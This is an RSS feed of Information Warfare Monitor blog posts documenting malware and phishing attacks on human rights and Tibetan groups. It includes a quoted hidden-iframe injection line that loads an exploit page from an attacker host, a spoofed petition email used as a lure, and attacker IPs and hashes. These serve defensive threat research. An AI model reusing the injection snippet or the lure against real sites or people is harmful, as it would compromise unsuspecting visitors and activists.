<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information Warfare Monitor &#187; Civil Society and NGOs</title>
	<atom:link href="http://www.infowar-monitor.net/tag/civil-society/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.infowar-monitor.net</link>
	<description>Tracking Cyberpower</description>
	<lastBuildDate>Thu, 01 Dec 2011 16:11:49 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Flash Malware Leads to Poison Ivy RAT on Human Rights Site</title>
		<link>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/</link>
		<comments>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/#comments</comments>
		<pubDate>Wed, 13 Jul 2011 18:26:01 +0000</pubDate>
		<dc:creator>shardy</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[human rights]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=7713</guid>
		<description><![CDATA[<blockquote>
In this post we document an instance of a human rights related website being compromised and used to disseminate malware. </blockquote>]]></description>
			<content:encoded><![CDATA[<div>
<p>Human rights and civil society organizations face a growing spectrum of online threats, including Internet filtering, website defacements, denial of service attacks, and targeted malware (malicious software) attacks. Such organizations can be particularly vulnerable to these threats due to limited resources and lack of computer network security support.</p>
<p>Malware attacks in particular are becoming an increasing problem for human rights and civil society groups. Past Information Warfare Monitor research has documented targeted email-based malware attacks on human rights groups and the use of compromised organizational websites to deliver malware to site visitors (see <a href="http://www.infowar-monitor.net/2010/08/human-rights-and-malware-attacks/">Human Rights and Malware Attacks</a>, <a href="http://www.infowar-monitor.net/2009/09/targeted-malware-attack-on-foreign-correspondents-based-in-china/">Targeted Malware Attack on Foreign Correspondents based in China</a>, <a href="http://www.infowar-monitor.net/2010/11/nobel-peace-prize-amnesty-hk-and-malware/">Nobel Peace Prize, Amnesty International HK and Malware</a>). In this blog post we document another instance of a human rights related website being compromised and used to disseminate malware.</p>
<p>While conducting analysis of <a href="http://opennet.net/">OpenNet Initiative</a><sup>1</sup> Internet filtering test results, we found one site<sup>2</sup> covering Chinese human rights issues that triggered an anti-virus alert. The AV program identified a file from the website as Trojan.Swifi. Looking into this issue, we were able to determine that the site had been compromised and was being used to distribute malware to its visitors.</p>
<p>Tracing our browsing history, we first found that one of the site’s pages had an embedded IFrame that looked out of place:<br />
<img src="https://lh6.googleusercontent.com/UQBXjhwUCvB3ipBJSc7jIj1Jgb0XOoc6kRS2v2rDE642tITAqO2p676EqtxsJP4Tk_amRL6mF5WwDZz9_oDOCppeNm_56Jbswk_VH68f_2W_hVBNF1U" alt="" width="800px;" height="117px;" /></p>
<p>The frame points to an HTML file on another site, which in turn loads a Flash file (SWF):<br />
<img src="https://lh6.googleusercontent.com/xd8fgI-tFSZz1wbwA_u2n_HuY-F2oHIVUkRCkGsLiVVx8MSy2cpDqGKixXuS1lxXMS9faAs0oOkoFa-oTVEwJV3auT7AYwL5SWQ8EBMuJgimQ2QTRgs" alt="" width="581px;" height="455px;" /></p>
<p>The Flash file uses <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110">CVE-2011-2110</a> (also described in <a href="http://www.adobe.com/support/security/bulletins/apsb11-18.html">APSB11-18</a>) to download and run another program hosted on the same website, without the knowledge or consent of the user. Trojan.Swifi is the name that Symantec gives to this threat. Shadowserver has a good <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617">writeup</a> on the first appearance of these Flash files being used in the wild, and gives some examples of sites they have found hosting this malware.</p>
<p>The URL of the file to download and run is encoded in the parameter passed to the SWF file in the link:<br />
<img src="https://lh6.googleusercontent.com/aj0l_T2woIeIOl6U4uc47xm7kGPzyy2AENTyGHaCXqGua3ewK5mCV97FIPr7l5k1t4aVMPn5z33q8COHp053DwZDkAoiKHt3igdZun-mFy_wUWUs3YA" alt="" width="800px;" height="49px;" /></p>
<p>The downloaded file itself is compressed with zlib and then XOR encrypted with a one-byte key. (The key is easy to determine: look for the two-byte zlib header.)</p>
<p>The day after we discovered this issue, the link in the IFrame had been changed. The core of the attack, the Flash file, was still the same. However, the Flash file was hosted on a different server and loaded a slightly different executable program: same functionality, different filename and metadata. The first site was one of the examples listed in the Shadowserver report, which may be the reason why the frame was changed to point to a new location with a new payload.</p>
<p>In both cases, the downloaded program installs <a href="http://www.poisonivy-rat.com/">Poison Ivy</a>, a remote administration tool (RAT).</p>
<p>The Flash file is the same in both cases, as the two payloads have the same encryption and compression format. The URL of the payload is passed as a parameter outside of the Flash program. The MD5 hashes of the two programs and the Flash file are:</p>
<pre>b0b33a68bc9b410b8e58979b0409d466   Flash file</pre>
<pre>First sample:
 c9c58cab8441c07816727a7d9bb77cda  Encrypted + compressed payload
 8ea8b81afa8928da7a12610dfebc57b2  Payload</pre>
<pre>Second sample:
 c99129da6460dc27b0c92f84c8e0c3ed  Encrypted + compressed payload
 baff5ea74cb2b55ea124a20dc6037f19  Payload</pre>
<p>The two downloaded files are slightly different, and have different icons and program information.</p>
<p>Each program contacts a command and control (C2) server using a different dynamic DNS hostname provided by changeip.org (the first using epac.to, the second jetos.com). Both DNS names stopped working within a day, resolving to 0.0.0.0, while the server continues to operate on an ISP in Singapore. The way both were shut down so quickly suggests that this malware has been sent out by more sites than just the Chinese news site on which we discovered it.</p>
<p>Metadata in the first program identifies it as “s1.exe”, while the second is “s3.exe”. Both use “aaaa” as the company name, and “Chinese (PRC)” as the language. The first uses an information bubble as an icon, the second uses a printer icon. s3 also calls itself “flash2” internally, and uses that reference as the dynamic DNS hostname.</p>
<p>It is likely that this C2 server will continue to operate using different dynamic DNS hostnames until it is taken offline by the ISP, assuming the ISP is able and willing to shut it down (so far, the ISP has not responded to the IWM’s abuse reports beyond automated replies from its support ticketing system). Searching records of previously reported malware activity does not show anything specific to the IP that these programs connect to, although it does show many connections to IPs in the same netblock. From our initial examination, the network hosting this C2 server seems ripe for abuse.</p>
<p>Although this is a legitimate news site, any visitor who had not applied the recent Flash APSB11-18 update would have been infected with the Poison Ivy remote administration tool, giving an attacker full access to the victim’s computer. Due to the location of the hosting provider and the dynamic DNS services used, it is likely that the command and control server will remain active and that this specific threat will persist. Only one line of the legitimate web page needed to be changed in order to compromise every single visitor to the site.</p>
<p>Just as former IWM researcher Nart Villeneuve <a href="http://www.infowar-monitor.net/2010/11/nobel-peace-prize-amnesty-hk-and-malware/">mentioned last November</a>, we can expect attacks to continue against the visitors of human rights websites via the legitimate but compromised websites themselves. In this case, the attack was patched very quickly and was not a 0day when discovered. However, the time it takes in general for vulnerabilities such as CVE-2011-2110 to be patched versus the rate of these exploits becoming weaponized and actively deployed is troublesome. This threat is especially a problem for smaller organizations that do not have dedicated IT staff with an extensive security budget.</p>
</div>
<hr />
<div><sup>1</sup> The OpenNet Initiative (ONI) is a sister project to the Information Warfare Monitor. It is a collaborative partnership of three institutions: the Citizen Lab at the Munk School of Global Affairs, University of Toronto; the Berkman Center for Internet &amp; Society at Harvard University; and the SecDev Group (Ottawa). The objective of the ONI is to investigate, expose and analyze Internet filtering and surveillance practices in a credible and non-partisan fashion.</div>
<div><sup>2</sup> We are choosing not to identify the website, by request of the website owner, due to ongoing attacks.</div>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2011/07/flash-malware-leads-to-poison-ivy-rat-on-human-rights-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Contestations in Cyberspace This Week</title>
		<link>http://www.infowar-monitor.net/2011/07/7686/</link>
		<comments>http://www.infowar-monitor.net/2011/07/7686/#comments</comments>
		<pubDate>Fri, 01 Jul 2011 19:21:41 +0000</pubDate>
		<dc:creator>Editor</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[Breachfest 2011]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Cyber Attacks]]></category>
		<category><![CDATA[e-G8]]></category>
		<category><![CDATA[lulzsec]]></category>
		<category><![CDATA[OECD]]></category>
		<category><![CDATA[Syrian Electronic Army]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=7686</guid>
		<description><![CDATA[<blockquote>

<p>Contestation in and about cyberspace continued this week, with many instances of political events on the ground translating into anonymous actions in cyberspace, as well as an instance of multi-stakeholder disagreement regarding rules of the road for cyberspace. </p></blockquote>]]></description>
			<content:encoded><![CDATA[<p><strong>Contestations in Cyberspace this Week<br />
</strong></p>
<p>Contestation in and about cyberspace continued this week, with many instances of political events on the ground translating into anonymous actions in cyberspace, as well as an instance of multi-stakeholder disagreement regarding rules of the road for cyberspace. </p>
<p>On June 25, <a href="http://pastebin.com/1znEGmHa">LulzSec announced the end of its operations</a>. <a href="http://newyork.ibtimes.com/articles/171674/20110629/lulzsec-leader-sabu-identity-anonymous-antisec-disband-topiary-outed.htm">Some point out</a> that this announcement coincides with <a href="http://newyork.ibtimes.com/articles/171674/20110629/lulzsec-leader-sabu-identity-anonymous-antisec-disband-topiary-outed.htm">intensified backlash activity around the group</a>: increasing scrutiny from authorities and rival groups alike—such as the active seeking out of LulzSec members. On the same day as the announcement, a <a href="http://latimesblogs.latimes.com/technology/2011/06/hacker-group-claims-to-expose-identitites-of-lulzsec-members.html">Pastebin dump revealed</a> the names and personal information of alleged core LulzSec members. However, although LulzSec has disbanded, targeted and politically motivated cyber attacks continued.</p>
<p>Breaches continued this week under the banner of AntiSec—the merged LulzSec and Anonymous operation. The group has continued its attack on Arizona’s Department of Public Safety and released personal information about police. Last week, the outfit breached the computers of the DPS and <a href="http://www.itproportal.com/2011/06/24/lulzsec-attacks-arizona-police-cites-immigration-policies-motivation/">released documents</a> in protest of Arizona’s immigration laws. At the same time, Anonymous also released content taken from the servers of other governments—Anguilla, Brazil and <a href="http://www.securitynewsdaily.com/anonymous-hackers-leak-zimbabwe-government-data-0917/">Zimbabwe</a> (in protest of President Mugabe). The group also leaked some US government documents, such as a counter cyber-terrorism training file. Yesterday, the group also attacked an <a href="http://orlandofloridaguide.com">Orlando, Florida tourism Web site</a> as part of an Orlando boycott campaign <a href="http://www.bbc.co.uk/news/world-us-canada-13952864">in protest of the city’s treatment of its local Food Not Bombs chapter</a>—a grassroots group which distributes food to the homeless.</p>
<p>Other groups have launched their own politically targeted attacks this week. It was <a href="http://www.pcmag.com/article2/0,2817,2387563,00.asp">reported</a> that a member of TeaMp0isoN has—in protest of the war in Iraq—leaked personal information about Tony Blair, along with the information of those members of government who supported the war in Iraq and the war on terror. Further, a lone hacker claimed responsibility for the <a href="http://www.infosecurity-us.com/view/19028/new-group-of-hacktivists-claim-downing-of-mastercard-website/">DDoS attack against Mastercard</a>, which knocked the site offline in some areas on Tuesday. Gannett Government Media, the publisher of government news sites and print media as well as military-related publications, disclosed an attack on its servers that occurred on June 7. <a href="http://militarytimes.com/news/2011/06/gannett-cyberattack-statement/">In its statement</a>, Gannett announced that attackers were able to gain unauthorized access to files containing information about some of its users. Web sites that were breached included those belonging to the military-related publications Defense News, the Armed Forces Journal, the Federal Times, Military Times Edge, Navy Times, Air Force Times and the Marine Corps Times, amongst others. </p>
<p>Meanwhile, as new Information Warfare Monitor reports document <a href="http://www.infowar-monitor.net/2011/06/syrian-electronic-army-disruptive-attacks-and-hyped-targets/">here</a> and <a href="http://www.infowar-monitor.net/2011/06/syrian-electronic-army-defaces-41-web-sites-one-uk-government-web-site/">here</a>, the Syrian Electronic Army has intensified its defacements of Western and Israeli Web sites in protest of Western interference in Syria’s internal affairs, and of Israel’s position on Syria and Palestine. At the same time, a Facebook group called the “Syrian Hackers School” has been recruiting members and promoting DoS tools and instructions on how to exploit Web site vulnerabilities.</p>
<p>The worries of an increasingly restricted Internet <a href="http://www.infowar-monitor.net/2011/05/7301/">expressed by civil society groups in the lead-up to the recent eG8 summit</a> have now become a reality, crystallized in the final OECD <a href="http://www.oecd.org/dataoecd/40/21/48289796.pdf">communiqué</a> on Internet Policy-Making Principles—a document that evolved out of the OECD’s meeting on the Internet Economy this week in Paris, in which governments, businesses, technical experts, and civil society participated. Eighty civil society groups, under the <a href="http://csisac.org/">Civil Society Information Society Advisory Council</a> (CSISAC) coalition, refused to endorse the communiqué. </p>
<p>In <a href="https://www.eff.org/files/filenode/international/CSISAC%20Statement%20on%20OECD%20Communique%2006282011%20FINAL%20COMMENTS%282%29.pdf">a statement released this week</a>, the CSISAC expressed its opposition to the document’s emphasis on intellectual property rights protection in guiding Internet policy. It expressed concern that the text may have the effect of elevating cyber security and intellectual property rights to the same level as international human rights (such as freedom of expression), to the point that the former would be disproportionately protected at the expense of the latter. For instance, CSISAC is concerned that the communiqué encourages <a href="http://arstechnica.com/tech-policy/news/2011/06/civilized-high-level-global-conference-wants-isps-to-play-copyright-cophigh-level-global-conference-wants-isps-to-play-copyright-cop.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss">private intermediaries to make decisions regarding the “legality of content passing through their networks and platforms”</a>. CSISAC pointed out that: </p>
<blockquote><p>This approach could create incentives for Internet intermediaries to delete or block contested content and lead to network filtering, which would harm online expression. In addition Internet intermediaries could voluntarily adopt a &#8220;graduated response&#8221; (the so-called three strikes rule) under which Internet users&#8217; access could be terminated based solely on repeated allegations of infringement. </p></blockquote>
<p>For a more detailed summary and analysis of the OECD meeting and civil society objections, see <a href="http://blog.internetgovernance.org/blog/_archives/2011/6/28/4847563.html">the Internet Governance Project’s latest blogpost</a>. For more on <a href="http://www.boingboing.net/2011/06/22/leaked-uk-copyright.html">increasing censorship in democracies</a>, <a href="http://www.washingtonpost.com/blogs/blogpost/post/web-censorship-moves-to-democracies-the-west/2011/06/27/AGPi4xnH_blog.html">see this Washington Post piece</a> which references <a href="http://www.google.com/transparencyreport/governmentrequests/removals/">Google’s recently updated Transparency Report</a>. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2011/07/7686/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>China&#8217;s Human-Rights Hacking</title>
		<link>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/</link>
		<comments>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/#comments</comments>
		<pubDate>Wed, 03 Feb 2010 20:28:19 +0000</pubDate>
		<dc:creator>gwalton</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[Espionage]]></category>
		<category><![CDATA[GhostNet]]></category>
		<category><![CDATA[human rights]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Tibet]]></category>
		<category><![CDATA[US]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=5509</guid>
		<description><![CDATA[<a href="http://online.wsj.com/article/SB10001424052748704722304575038080333488998.html?mod=googlenews_wsj">WSJ Opinion Asia</a>: Attempts to silence critics extend beyond the mainland's borders.

<blockquote>Google's recent travails have drawn much-needed attention to the threat of Chinese cyber attacks on corporations. But there's another war being fought against a less publicized target: China's online human-rights activists.

Only two days after Hillary Clinton's January 21 speech supporting Internet freedom, five Chinese human-rights groups' Web sites, most of which have foreign-based servers, were paralyzed for up to 16 hours by denial-of-service attacks.

It's impossible to pinpoint exactly where the attacks on the weekend of January 23 to 24 originated, but the groups' sites have been attacked before, usually at sensitive times such as the 20-year anniversary of the Tiananmen Square massacre last June and China's 60th anniversary in October. For about the last three years, human-rights sites have not been able to operate from within China's censored borders.</blockquote>]]></description>
			<content:encoded><![CDATA[<p>Whether China&#8217;s &#8220;cyber militias&#8221; are merely teenage hackers or are state-supported is uncertain. What&#8217;s for sure is that these are not randomly targeted Web sites. They include the Independent Chinese PEN Center and China Human Rights Defenders, which have been calling publicly for the release of Liu Xiaobo, the ICPC&#8217;s former president and the co-author of the democratic manifesto called Charter &#8217;08. Similarly, the London-based International Tibet Support Network&#8217;s Web site has been down three times in the last two weeks.</p>
<p>China-based hackers have also targeted the State Department, the Naval War College, NASA and the World Bank in recent years. The so-called &#8220;Titan Rain&#8221; and &#8220;Ghostnet&#8221; cyber-espionage campaigns starting in 2003 involved hackers systematically infiltrating thousands of computer systems in hundreds of countries. While there&#8217;s no smoking gun, the Chinese military has heavily invested in equipping its cyber units, and there is a consensus in the U.S. defense community that the Chinese government at the very least tacitly supports thousands of hackers and cyberspace academics. Tibetan activist groups in particular have gotten used to cyber intrusions, which surged after unrest erupted in western China last March.</p>
<p>The hacking of the human-rights groups&#8217; sites may not seem as threatening as, say, an attack on critical infrastructure. But the intent is just as dangerous: to intimidate and silence those who try to speak up for the Chinese people. Even more reason for the U.S. and other free nations to bolster their defenses.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2010/02/chinas-human-rights-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;0day&#8221;: Civil Society and Cyber Security</title>
		<link>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/</link>
		<comments>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/#comments</comments>
		<pubDate>Wed, 28 Oct 2009 13:13:50 +0000</pubDate>
		<dc:creator>villeneuvewalton</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Civil Society and NGOs]]></category>
		<category><![CDATA[GhostNet]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Zero-day Attack]]></category>

		<guid isPermaLink="false">http://www.infowar-monitor.net/?p=5271</guid>
		<description><![CDATA[by Nart Villeneuve &#038; Greg Walton Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities [...]]]></description>
			<content:encoded><![CDATA[<p>by Nart Villeneuve &#038; Greg Walton</p>
<p>Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks. </p>
<p>However, civil society organizations are being compromised by attackers using &#8220;0day&#8221; exploits – vulnerabilities for which there is no patch or &#8220;fix&#8221; available from the software vendor. Therefore, even if all the software a civil society organization is using is completely up-to-date, it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.</p>
<p>It is difficult to determine who is behind the attacks, and there may be no intent to target civil society specifically. Using a human rights themed email in a social engineering attack might simply be a convenient way to get people&#8217;s attention and compromise computer systems. Moreover, it remains unclear whether the attackers were able to acquire 0day exploits before they became public, or whether they simply leveraged them quickly after they became publicly available and before a vendor-supplied security patch existed. </p>
<p>Therefore, in this post we explore cases in which there is some form of relationship between 0day exploits and their use against civil society organizations, in an effort to understand the effect of these attacks given the difficult nature of attribution. </p>
<p>In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.<sup>1</sup> The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.</p>
<p><strong>Summary</strong></p>
<ul>
<li>Civil society organizations are compromised and used as vehicles to deliver 0day exploits</li>
<li>Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available</li>
<li>Attackers leverage human rights issues as the context for malware distribution</li>
<li>The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.</li>
</ul>
<p><strong>Background</strong></p>
<p>There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:</p>
<blockquote><p>One of the most striking features of these attacks is how quickly they adapt new exploits to their<br />
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.<sup>2</sup></p></blockquote>
<p>However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new. </p>
<p>Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.<sup>3</sup> Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.<sup>4</sup> These attacks targeted NGOs, the Tibetan community and the Falun Gong movement. Van Horenbeeck&#8217;s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.<sup>5</sup></p>
<p>Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the &#8220;GhostNet&#8221; investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with malware that connected back to a control server at 221.10.254.248 using the host name 927.bigwww.com.<sup>6</sup> On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.<sup>7</sup></p>
<p>In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as at a Tibetan NGO called Drewla had been compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including exploitation of the JBIG2 buffer overflow vulnerability.<sup>8</sup> At Drewla we also found a computer connecting to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck,<sup>9</sup> as well as connections to religion.xicp.net, which was reportedly serving a 0day in February 2009.<sup>10</sup></p>
<p><strong>Investigation</strong></p>
<p>On 2009-07-06 ISC SANS posted a list of domains that were hosting 0day Internet Explorer exploits, and 64tianwang.com was on the list.<sup>11</sup> 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus more widely on human rights and had to move its website overseas after it was shut down by Chinese authorities.<sup>12</sup> The organization&#8217;s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.<sup>13</sup><sup>14</sup> 64tianwang.com has previously been a target for internet-based attacks.<sup>15</sup></p>
<p>An examination of the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe inserted into the legitimate content on the page. In fact, we have seen “iframe attacks” affect a variety of organizations, including the Foreign Correspondents’ Club of China (www.fccchina.org).<sup>16</sup> Anyone visiting 64tianwang.com was loading a malicious page from rfsb.xicp.net:</p>
<blockquote><p>
document.write(&#8220;&lt;iFraMe width=&#8217;0&#8242; height=&#8217;0&#8242; src=&#8217;hxxp://rfsb.xicp.net/css/a.htm&#8217; frameborder=&#8217;0&#8242;></iFraMe>&#8220;);
</p></blockquote>
<p>The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.<sup>17</sup> Anyone visiting 64tianwang.com using Internet Explorer was likely compromised. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc1.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc1-300x124.png" alt="0day.doc1" title="0day.doc1" width="300" height="124" class="aligncenter size-medium wp-image-5276" /></a></p>
<p>Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers renamed the directory used in the initial attack from &#8220;css&#8221; to &#8220;cssbak&#8221; and began serving the Microsoft Office Web Components 0day from the &#8220;css&#8221; directory instead.<sup>18</sup> Several versions of Microsoft Office were affected, and anyone visiting this malicious page could be compromised even if their security updates were current.<sup>19</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc2.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc2-300x123.png" alt="0day.doc2" title="0day.doc2" width="300" height="123" class="aligncenter size-medium wp-image-5279" /></a></p>
<p>The details for the malicious website are:</p>
<blockquote><p>
Name: rfsb.xicp.net<br />
Address: 222.223.89.17<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting phishing pages posing as login screens for a variety of Chinese or Chinese-language versions of email providers, including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.</p>
<p>“Phishing” is a term that refers to the fraudulent use of a legitimate-looking website to entice a user into revealing sensitive information such as user names and passwords.<sup>20</sup> In this case, the attackers appear to be particularly interested in compromising users of Chinese email providers.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc3.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc3-300x152.png" alt="0day.doc3" title="0day.doc3" width="300" height="152" class="aligncenter size-medium wp-image-5280" /></a></p>
<p>If users attempt to log in to their email account, the credentials are forwarded to various servers under the attackers&#8217; control:</p>
<blockquote><p>
121.22.23.254<br />
netname: UNICOM-HE<br />
descr: China Unicom Hebei province network<br />
descr: China Unicom<br />
country: CN</p>
<p>124.237.109.234<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>121.22.28.29<br />
netname: QHD-YIWANGKEJI<br />
descr: CNC Group CHINA169 Hebei Province Network<br />
country: CN</p>
<p>222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN</p>
<p>my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)<br />
netname: CHINANET-HE<br />
descr: CHINANET hebei province network<br />
descr: China Telecom<br />
country: CN
</p></blockquote>
<p>The attackers use a script that directs the user to a server under their control and then redirects the user to the legitimate mail provider.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc4.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc4-300x33.png" alt="0day.doc4" title="0day.doc4" width="300" height="33" class="aligncenter size-medium wp-image-5282" /></a></p>
<p>In the case of QQ the attackers used malicious Flash files that connect out to a server under the attackers&#8217; control.<sup>21</sup></p>
<p>Interestingly, all of the IP addresses are in Hebei Province.</p>
<p>The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.<sup>22</sup> </p>
<p>Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.</p>
<p>This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.<sup>23</sup> </p>
<p>The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a &#8220;Petition for the Release of Tibetan Filmmaker Dhondup Wangchen&#8221; hosted on Facebook, which is sponsored by Students for a Free Tibet. However, the email also contains a link to hxxp://dump.vicp.cc/groups/articles.asp?n=3, which loads the real petition along with a malicious frame.</p>
<blockquote><p>
    Subject: Re: Petition for Tibetan filmmaker&#8217;s<br />
    Date: Wed, 29 Jul 2009 22:52:26 +0800<br />
    From: Tseten Samdup<br />
    To: tsetenfreetibet@gmail.com</p>
<p>    Here is the the petition lauched by SFT.</p>
<p>http://apps.facebook.com/causes/petitions/26?m=bcb306a2&#038;recruiter_id=58958974&#038;_fb_noscript=1<hxxp://dump.vicp.cc/groups/articles.asp?n=3></p>
<p>    They have already collected 27,660 signatures.<br />
    Please sign your name if you have not.</p>
<p>    Tseden Samdup</p>
<p>    > ———- Forwarded message ———-<br />
    > From: RSF ASIA<br />
    > Date: Wed, Jul 29, 2009 at 8:05 AM<br />
    > Subject: Petition for Tibetan filmmaker’s<br />
    > To: tsetenfreetibet@gmail.com<br />
    ><br />
    ><br />
    > Reporters Without Borders/Reporters sans frontières<br />
    ><br />
    > 29 July 2009<br />
    ><br />
    > CHINA – TIBET<br />
    > More than 13,000 signatures on petition for Tibetan filmmaker’s release<br />
    > http://www.rsf.org/More-than-13-000-signatures-on.html<br />
    ><br />
    > Reporters Without Borders has given the Chinese authorities a petition<br />
    > calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,<br />
    > who has been held since 23 March 2008 and is seriously ill with hepatitis B,<br />
    > which is not being properly treated. According to recent reports, he is now<br />
    > in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).<br />
    ><br />
    > At the time of his arrest, Wangchen was completing a documentary about Tibet<br />
    > that was shown to foreign journalists in Beijing during the Olympic Games.<br />
    > He may be tried on charges of “separatism”.<br />
    ><br />
    > &#8220;There is an urgent need for the competent authorities to heed the appeal<br />
    > made by thousands of citizens around the world on behalf of a man whose only<br />
    > crime was to have filmed interviews,&#8221; Reporters Without Borders said. &#8220;The<br />
    > government should take account of Dhondup Wangchen&#8217;s state of health and<br />
    > free him on humanitarian grounds.&#8221;<br />
    ><br />
    > Reporters Without Borders handed in the petition today to the Chinese<br />
    > embassy in Paris. It was signed by 13,941 people, who included Tibetans,<br />
    > Indians, westerners, and eight Australian parliamentarians. Wangchen&#8217;s wife,<br />
